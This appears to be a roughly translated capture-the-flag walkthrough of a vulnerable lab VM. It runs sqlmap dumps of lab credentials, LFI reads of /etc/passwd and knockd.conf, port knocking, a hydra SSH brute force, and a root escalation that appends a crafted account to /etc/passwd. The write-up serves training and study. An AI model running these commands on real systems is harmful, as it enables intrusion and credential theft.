1. Scan to obtain the IP address of the target machine
arp-scan -l
192.168.203.148
2. Obtain website information
1.nmap
nmap -sV -A 192.168.203.148
Ports 22 and 80 are open
2.Wappaloyzer
Access the home page
Web server: Apache 2.4.38
3. dirb
dirb http://192.168.203.148
nothing to take advantage of
3. Analyze the website
Display here shows us all user information
Search Here you can query the corresponding information by entering the first or last name
Manage the login user password here, and began to suspect sql injection here, but there was no detection, and finally found that there was sql injection in Search
4.Burp suit
After crawling, it is found that it is a post parameter
5.Sqlmap
Save the data packet to 1.txt for blasting
Explosive library
sqlmap -r /root/1.txt -p search --dbs
Burst the watch
sqlmap -r /root/1.txt -p search -D users --tables
Burst
sqlmap -r /root/1.txt -p search -D users -T UserDetails --columns
burst field
sqlmap -r /root/1.txt -p search -D users -T UserDetails -C firstname,lastname,username,password --dump
+-----------+------------+-----------+---------------+| firstname | lastname | username | password |+-----------+------------+-----------+---------------+| Mary | Moe | marym | 3kfs86sfd || Julie | Dooley | julied | 468sfdfsd2 || Fred | Flintstone | fredf | 4sfd87sfd1 || Barney | Rubble | barneyr | RocksOff || Tom | Cat | tomc | TC&TheBoyz || Jerry | Mouse | jerrym | B8m#48sd || Wilma | Flintstone | wilmaf | Pebbles || Betty | Rubble | bettyr | BamBam01 || Chandler | Bing | chandlerb | UrAG0D! || Joey | Tribbiani | joeyt | Passw0rd || Rachel | Green | rachelg | yN72#dsd || Ross | Geller | rossg | ILoveRachel || Monica | Geller | monicag | 3248dsds7s || Phoebe | Buffay | phoebeb | smellycats || Scooter | McScoots | scoots | YR3BVxxxw87 || Donald | Trump | janitor | Ilovepeepee || Scott | Morrison | janitor2 | Hawaii-Five-0 |+-----------+------------+-----------+---------------+
But these accounts cannot log in, and try to use ssh, but ssh is also filtered, and run another database (Staff)
sqlmap -r /root/1.txt -p search -D Staff --tablessqlmap -r /root/1.txt -p search -D Staff -T Users --columnssqlmap -r /root/1.txt -p search -D Staff -T Users --dump
+--------+--------------------------------------------------+----------+| UserID | Password | Username |+--------+--------------------------------------------------+----------+| 1 | 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) | admin |+--------+--------------------------------------------------+----------+admin transorbital1
Landed successfully
You can see that the prompt File does not exist appears at the bottom of the page, and it feels very likely that it is LFI (local file inclusion)
wfuzz ‐p 127.0.0.1:8080:HTTP #‐p:添加代理
Dictionary address: https://github.com/danielmiessler/SecLists
We use the burp‐parameter‐names.txt dictionary inside
Use burp to try to blast
http://192.168.203.148/manage.php?a=../../../../etc/passwd
Knowing that the variable name is file
Check the scheduling of tasks in the Linux system through …/…/…/…/…/…/proc/sched_debug
http://192.168.203.148/manage.php?file=../../../../../../proc/sched_debug
4. Connection
Found that the system uses the knockd service
Read the knocked configuration file
http://192.168.203.148/manage.php?file=../../../../../etc/knockd.conf
Method 1 uses nc:
we need to knock on 7469 8475 9842
the port in turn to realize the door knocking operation
nc 192.168.203.148 7469
nc 192.168.203.148 8475
nc 192.168.203.148 9842
Method 2 uses nmap:
nmap -p 7469 192.168.203.148
nmap -p 8475 192.168.203.148
nmap -p 9842 192.168.203.148
Use hydra to see which users can log in to ssh, and save the username and password as user.txt and pass.txt files respectively:
PS: There should be no spaces in the dictionary
hydra -L user.txt -P pwd.txt 192.168.203.148 ssh
login: chandlerb password: UrAG0D! login: joeyt password:Passw0rdlogin: janitor password: Ilovepeepee
ssh connection
ssh [email protected]
Use the blasted user to log in, and then view the file ls -la
(you can view the hidden directory file), and janitor
find the hidden secrets-for-putin
directory in the user, which contains the passwordpasswords-found-on-post-it-notes.txt
BamBam01Passw0rdsmellycatsP0Lic#10-4B4-Tru3-0014uGU5T-NiGHts
We add these passwords to the password file and try to blast them again with hydra
hydra -L user.txt -P pwd.txt 192.168.203.148 ssh
blast out a new user
login: fredf password: B4-Tru3-001
ssh connection
5. Elevation of rights
ssh [email protected] -l
Found that fredf can NO Passwd
execute files with root permissions
Prompt to run with python test.py plus parameters
Enter the /opt/devstuff directory and see the test.py file
Meaning: 3 parameters, add the file content of the second parameter to the third parameter file, the test directory can be executed with root privileges
Idea: Construct an account with root privileges and put it in /etc/passwd, log in with the constructed account, and you will have root privileges
Generate with openssl:
openssl passwd -1 -salt js 233333
$1$js$8LV1DbndSIfP29vG.eYaj1
Write to tmp
ciyaso in the directory
echo 'js:$1$js$8LV1DbndSIfP29vG.eYaj1:0:0::/root:/bin/bash' > /tmp/js
Execute test:
cd /opt/devstuff/dist/testsudo ./test /tmp/js /etc/passwd
Login is successful, read flag